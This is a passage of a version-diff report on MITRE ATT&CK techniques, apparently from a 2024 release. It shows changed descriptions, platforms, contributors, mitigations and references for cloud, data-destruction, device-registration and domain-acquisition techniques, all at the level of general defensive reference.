| n: DOJ - Cisco Insider) | | ation: DOJ - Cisco Insider) |
New Mitigations:
- M1018: User Account Management
- M1032: Multi-factor Authentication
New Detections:
- DS0010: Cloud Storage (Cloud Storage Modification)
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-03 17:30:32.192000+00:00 | 2024-09-25 20:46:14.641000+00:00 |
description | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_data_sources | | Cloud Storage: Cloud Storage Modification |
[T1530] Data from Cloud Storage
Current version: 2.2
Version changed from: 2.1 → 2.2
New Detections:
- DS0025: Cloud Service (Cloud Service Metadata)
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-29 16:11:43.530000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[2] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Cloud Service: Cloud Service Metadata |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
[T1213] Data from Information Repositories
Current version: 3.4
Version changed from: 3.3 → 3.4
|
|
t | Adversaries may leverage information repositories to mine va | t | Adversaries may leverage information repositories to mine va |
| luable information. Information repositories are tools that | | luable information. Information repositories are tools that |
| allow for storage of information, typically to facilitate co | | allow for storage of information, typically to facilitate co |
| llaboration or information sharing between users, and can st | | llaboration or information sharing between users, and can st |
| ore a wide variety of data that may aid adversaries in furth | | ore a wide variety of data that may aid adversaries in furth |
| er objectives, or direct access to the target information. A | | er objectives, such as Credential Access, Lateral Movement, |
| dversaries may also abuse external sharing features to share | | or Defense Evasion, or direct access to the target informati |
| sensitive documents with recipients outside of the organiza | | on. Adversaries may also abuse external sharing features to |
| tion. The following is a brief list of example information | | share sensitive documents with recipients outside of the org |
| that may hold potential value to an adversary and may also | | anization (i.e., [Transfer Data to Cloud Account](https://at |
| be found on an information repository: * Policies, procedur | | tack.mitre.org/techniques/T1537)). The following is a brie |
| es, and standards * Physical / logical network diagrams * Sy | | f list of example information that may hold potential value |
| stem architecture diagrams * Technical system documentation | | to an adversary and may also be found on an information repo |
| * Testing / development credentials * Work / project schedul | | sitory: * Policies, procedures, and standards * Physical / |
| es * Source code snippets * Links to network shares and othe | | logical network diagrams * System architecture diagrams * Te |
| r internal resources Information stored in a repository may | | chnical system documentation * Testing / development credent |
| vary based on the specific instance or environment. Specifi | | ials (i.e., [Unsecured Credentials](https://attack.mitre.org |
| c common information repositories include web-based platform | | /techniques/T1552)) * Work / project schedules * Source cod |
| s such as [Sharepoint](https://attack.mitre.org/techniques/T | | e snippets * Links to network shares and other internal reso |
| 1213/002) and [Confluence](https://attack.mitre.org/techniqu | | urces * Contact or other sensitive information about busines |
| es/T1213/001), specific services such as Code Repositories, | | s partners and customers, including personally identifiable |
| IaaS databases, enterprise databases, and other storage infr | | information (PII) Information stored in a repository may v |
| astructure such as SQL Server. | | ary based on the specific instance or environment. Specific |
| | | common information repositories include the following: * St |
| | | orage services such as IaaS databases, enterprise databases, |
| | | and more specialized platforms such as customer relationshi |
| | | p management (CRM) databases * Collaboration platforms such |
| | | as SharePoint, Confluence, and code repositories * Messagin |
| | | g platforms such as Slack and Microsoft Teams In some case |
| | | s, information repositories have been improperly secured, ty |
| | | pically by unintentionally allowing for overly-broad access |
| | | by all users or even public access to unauthenticated users. |
| | | This is particularly common with cloud-native or cloud-host |
| | | ed services, such as AWS Relational Database Service (RDS), |
| | | Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMi |
| | | cro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 202 |
| | | 2) |
New Mitigations:
- M1041: Encrypt Sensitive Information
- M1054: Software Configuration
- M1060: Out-of-Band Communications Channel
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-01 16:27:47.391000+00:00 | 2024-10-28 19:10:16.960000+00:00 |
description | Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server. | Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
* Contact or other sensitive information about business partners and customers, including personally identifiable information (PII)
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include the following:
* Storage services such as IaaS databases, enterprise databases, and more specialized platforms such as customer relationship management (CRM) databases
* Collaboration platforms such as SharePoint, Confluence, and code repositories
* Messaging platforms such as Slack and Microsoft Teams
In some cases, information repositories have been improperly secured, typically by unintentionally allowing for overly-broad access by all users or even public access to unauthenticated users. This is particularly common with cloud-native or cloud-hosted services, such as AWS Relational Database Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022) |
x_mitre_version | 3.3 | 3.4 |
x_mitre_platforms[5] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Mitiga', 'description': 'Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops, I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots. Retrieved September 24, 2024.', 'url': 'https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots'} |
external_references | | {'source_name': 'TrendMicro Exposed Redis 2020', 'description': 'David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved September 25, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html'} |
external_references | | {'source_name': 'Cybernews Reuters Leak 2022', 'description': 'Vilius Petkauskas . (2022, November 3). Thomson Reuters collected and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.', 'url': 'https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/'} |
x_mitre_contributors | | Obsidian Security |
x_mitre_contributors | | Naveen Vijayaraghavan |
x_mitre_contributors | | Nilesh Dherange (Gurucul) |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | Naveen Vijayaraghavan, Nilesh Dherange (Gurucul) | |
x_mitre_platforms | Office 365 | |
[T1078.001] Valid Accounts: Default Accounts
Current version: 1.4
Version changed from: 1.3 → 1.4
New Mitigations:
- M1032: Multi-factor Authentication
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-07 14:27:04.770000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1578.003] Modify Cloud Compute Infrastructure: Delete Cloud Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Arun Seelagan, CISA'] |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-08 10:33:02.083000+00:00 | 2024-09-30 13:28:37.415000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1098.005] Account Manipulation: Device Registration
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
t | Adversaries may register a device to an adversary-controlled | t | Adversaries may register a device to an adversary-controlled |
| account. Devices may be registered in a multifactor authent | | account. Devices may be registered in a multifactor authent |
| ication (MFA) system, which handles authentication to the ne | | ication (MFA) system, which handles authentication to the ne |
| twork, or in a device management system, which handles devic | | twork, or in a device management system, which handles devic |
| e access and compliance. MFA systems, such as Duo or Okta, | | e access and compliance. MFA systems, such as Duo or Okta, |
| allow users to associate devices with their accounts in orde | | allow users to associate devices with their accounts in orde |
| r to complete MFA requirements. An adversary that compromise | | r to complete MFA requirements. An adversary that compromise |
| s a user’s credentials may enroll a new device in order to b | | s a user’s credentials may enroll a new device in order to b |
| ypass initial MFA requirements and gain persistent access to | | ypass initial MFA requirements and gain persistent access to |
| a network.(Citation: CISA MFA PrintNightmare)(Citation: Dar | | a network.(Citation: CISA MFA PrintNightmare)(Citation: Dar |
| kReading FireEye SolarWinds) In some cases, the MFA self-enr | | kReading FireEye SolarWinds) In some cases, the MFA self-enr |
| ollment process may require only a username and password to | | ollment process may require only a username and password to |
| enroll the account's first device or to enroll a device to a | | enroll the account's first device or to enroll a device to a |
| n inactive account. (Citation: Mandiant APT29 Microsoft 365 | | n inactive account. (Citation: Mandiant APT29 Microsoft 365 |
| 2022) Similarly, an adversary with existing access to a net | | 2022) Similarly, an adversary with existing access to a net |
| work may register a device to Azure AD and/or its device man | | work may register a device to Entra ID and/or its device man |
| agement system, Microsoft Intune, in order to access sensiti | | agement system, Microsoft Intune, in order to access sensiti |
| ve data or resources while bypassing conditional access poli | | ve data or resources while bypassing conditional access poli |
| cies.(Citation: AADInternals - Device Registration)(Citation | | cies.(Citation: AADInternals - Device Registration)(Citation |
| : AADInternals - Conditional Access Bypass)(Citation: Micros | | : AADInternals - Conditional Access Bypass)(Citation: Micros |
| oft DEV-0537) Devices registered in Azure AD may be able t | | oft DEV-0537) Devices registered in Entra ID may be able t |
| o conduct [Internal Spearphishing](https://attack.mitre.org/ | | o conduct [Internal Spearphishing](https://attack.mitre.org/ |
| techniques/T1534) campaigns via intra-organizational emails, | | techniques/T1534) campaigns via intra-organizational emails, |
| which are less likely to be treated as suspicious by the em | | which are less likely to be treated as suspicious by the em |
| ail client.(Citation: Microsoft - Device Registration) Addit | | ail client.(Citation: Microsoft - Device Registration) Addit |
| ionally, an adversary may be able to perform a [Service Exha | | ionally, an adversary may be able to perform a [Service Exha |
| ustion Flood](https://attack.mitre.org/techniques/T1499/002) | | ustion Flood](https://attack.mitre.org/techniques/T1499/002) |
| on an Azure AD tenant by registering a large number of devi | | on an Entra ID tenant by registering a large number of devi |
| ces.(Citation: AADInternals - BPRT) | | ces.(Citation: AADInternals - BPRT) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-03 17:38:39.065000+00:00 | 2024-09-25 20:39:53.597000+00:00 |
description | Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)
Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT) | Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)
Devices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | SaaS | |
[T1498.001] Network Denial of Service: Direct Network Flood
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-30 21:01:53.685000+00:00 | 2024-10-15 15:54:49.943000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1562.007] Impair Defenses: Disable or Modify Cloud Firewall
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
t | Adversaries may disable or modify a firewall within a cloud | t | Adversaries may disable or modify a firewall within a cloud |
| environment to bypass controls that limit access to cloud re | | environment to bypass controls that limit access to cloud re |
| sources. Cloud firewalls are separate from system firewalls | | sources. Cloud firewalls are separate from system firewalls |
| that are described in [Disable or Modify System Firewall](ht | | that are described in [Disable or Modify System Firewall](ht |
| tps://attack.mitre.org/techniques/T1562/004). Cloud enviro | | tps://attack.mitre.org/techniques/T1562/004). Cloud enviro |
| nments typically utilize restrictive security groups and fir | | nments typically utilize restrictive security groups and fir |
| ewall rules that only allow network activity from trusted IP | | ewall rules that only allow network activity from trusted IP |
| addresses via expected ports and protocols. An adversary ma | | addresses via expected ports and protocols. An adversary wi |
| y introduce new firewall rules or policies to allow access i | | th appropriate permissions may introduce new firewall rules |
| nto a victim cloud environment. For example, an adversary ma | | or policies to allow access into a victim cloud environment |
| y use a script or utility that creates new ingress rules in | | and/or move laterally from the cloud control plane to the da |
| existing security groups to allow any TCP/IP connectivity, o | | ta plane. For example, an adversary may use a script or util |
| r remove networking limitations to support traffic associate | | ity that creates new ingress rules in existing security grou |
| d with malicious activity (such as cryptomining).(Citation: | | ps (or creates new security groups entirely) to allow any TC |
| Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromise | | P/IP connectivity to a cloud-hosted instance.(Citation: Palo |
| d Cloud Compute Credentials 2022) Modifying or disabling a | | Alto Unit 42 Compromised Cloud Compute Credentials 2022) Th |
| cloud firewall may enable adversary C2 communications, later | | ey may also remove networking limitations to support traffic |
| al movement, and/or data exfiltration that would otherwise n | | associated with malicious activity (such as cryptomining).( |
| ot be allowed. | | Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 |
| | | Compromised Cloud Compute Credentials 2022) Modifying or di |
| | | sabling a cloud firewall may enable adversary C2 communicati |
| | | ons, lateral movement, and/or data exfiltration that would o |
| | | therwise not be allowed. It may also be used to open up reso |
| | | urces for [Brute Force](https://attack.mitre.org/techniques/ |
| | | T1110) or [Endpoint Denial of Service](https://attack.mitre. |
| | | org/techniques/T1499). |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-15 00:25:36.502000+00:00 | 2024-10-16 19:38:57.374000+00:00 |
description | Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. | Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
[T1562.008] Impair Defenses: Disable or Modify Cloud Logs
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-12 21:13:56.431000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.0 | 2.1 |
x_mitre_platforms[2] | Google Workspace | Office Suite |
x_mitre_platforms[3] | Azure AD | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
[T1556.001] Modify Authentication Process: Domain Controller Authentication
Current version: 2.1
Version changed from: 2.0 → 2.1
New Mitigations:
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-20 20:10:26.613000+00:00 | 2024-08-21 15:26:54.386000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1568.002] Dynamic Resolution: Domain Generation Algorithms
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-11 18:26:23.432000+00:00 | 2024-10-15 15:55:16.111000+00:00 |
external_references[5]['url'] | https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html | https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e |
x_mitre_version | 1.0 | 1.1 |
[T1484] Domain or Tenant Policy Modification
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-19 04:27:31.884000+00:00 | 2024-10-15 15:55:32.946000+00:00 |
external_references[9]['description'] | Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019. | Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024. |
external_references[9]['url'] | http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ | https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/ |
x_mitre_version | 3.0 | 3.1 |
x_mitre_platforms[1] | Azure AD | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | SaaS | |
[T1583.001] Acquire Infrastructure: Domains
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
t | Adversaries may acquire domains that can be used during targ | t | Adversaries may acquire domains that can be used during targ |
| eting. Domain names are the human readable names used to rep | | eting. Domain names are the human readable names used to rep |
| resent one or more IP addresses. They can be purchased or, i | | resent one or more IP addresses. They can be purchased or, i |
| n some cases, acquired for free. Adversaries may use acquir | | n some cases, acquired for free. Adversaries may use acquir |
| ed domains for a variety of purposes, including for [Phishin | | ed domains for a variety of purposes, including for [Phishin |
| g](https://attack.mitre.org/techniques/T1566), [Drive-by Com | | g](https://attack.mitre.org/techniques/T1566), [Drive-by Com |
| promise](https://attack.mitre.org/techniques/T1189), and Com | | promise](https://attack.mitre.org/techniques/T1189), and Com |
| mand and Control.(Citation: CISA MSS Sep 2020) Adversaries m | | mand and Control.(Citation: CISA MSS Sep 2020) Adversaries m |
| ay choose domains that are similar to legitimate domains, in | | ay choose domains that are similar to legitimate domains, in |
| cluding through use of homoglyphs or use of a different top- | | cluding through use of homoglyphs or use of a different top- |
| level domain (TLD).(Citation: FireEye APT28)(Citation: Paypa | | level domain (TLD).(Citation: FireEye APT28)(Citation: Paypa |
| lScam) Typosquatting may be used to aid in delivery of paylo | | lScam) Typosquatting may be used to aid in delivery of paylo |
| ads via [Drive-by Compromise](https://attack.mitre.org/techn | | ads via [Drive-by Compromise](https://attack.mitre.org/techn |
| iques/T1189). Adversaries may also use internationalized dom | | iques/T1189). Adversaries may also use internationalized dom |
| ain names (IDNs) and different character sets (e.g. Cyrillic | | ain names (IDNs) and different character sets (e.g. Cyrillic |
| , Greek, etc.) to execute "IDN homograph attacks," creating | | , Greek, etc.) to execute "IDN homograph attacks," creating |
| visually similar lookalike domains used to deliver malware t | | visually similar lookalike domains used to deliver malware t |
| o victim machines.(Citation: CISA IDN ST05-016)(Citation: tt | | o victim machines.(Citation: CISA IDN ST05-016)(Citation: tt |
| _httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: ht | | _httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: ht |
| track_unhcr)(Citation: lazgroup_idn_phishing) Different URI | | track_unhcr)(Citation: lazgroup_idn_phishing) Different URI |
| s/URLs may also be dynamically generated to uniquely serve m | | s/URLs may also be dynamically generated to uniquely serve m |
| alicious content to victims (including one-time, single use | | alicious content to victims (including one-time, single use |
| domain names).(Citation: iOS URL Scheme)(Citation: URI)(Cita | | domain names).(Citation: iOS URL Scheme)(Citation: URI)(Cita |
| tion: URI Use)(Citation: URI Unique) Adversaries may also a | | tion: URI Use)(Citation: URI Unique) Adversaries may also a |
| cquire and repurpose expired domains, which may be potential | | cquire and repurpose expired domains, which may be potential |
| ly already allowlisted/trusted by defenders based on an exis | | ly already allowlisted/trusted by defenders based on an exis |
| ting reputation/history.(Citation: Categorisation_not_bounda | | ting reputation/history.(Citation: Categorisation_not_bounda |
| ry)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_ | | ry)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_ |
| Fronting)(Citation: bypass_webproxy_filtering) Domain regis | | Fronting)(Citation: bypass_webproxy_filtering) Domain regis |
| trars each maintain a publicly viewable database that displa | | trars each maintain a publicly viewable database that displa |
| ys contact information for every registered domain. Private | | ys contact information for every registered domain. Private |
| WHOIS services display alternative information, such as thei | | WHOIS services display alternative information, such as thei |
| r own company data, rather than the owner of the domain. Adv | | r own company data, rather than the owner of the domain. Adv |
| ersaries may use such private WHOIS services to obscure info | | ersaries may use such private WHOIS services to obscure info |
| rmation about who owns a purchased domain. Adversaries may f | | rmation about who owns a purchased domain. Adversaries may f |
| urther interrupt efforts to track their infrastructure by us | | urther interrupt efforts to track their infrastructure by us |
| ing varied registration information and purchasing domains w | | ing varied registration information and purchasing domains w |
| ith different domain registrars.(Citation: Mandiant APT1) | | ith different domain registrars.(Citation: Mandiant APT1) I |
| | | n addition to legitimately purchasing a domain, an adversary |
| | | may register a new domain in a compromised environment. For |
| | | example, in AWS environments, adversaries may leverage the |
| | | Route53 domain service to register a domain and create hoste |
| | | d zones pointing to resources of the threat actor’s choosing |
| | | .(Citation: Invictus IR DangerDev 2024) |
Details
values_changedSTIX Field | Old value | New Value |
---|
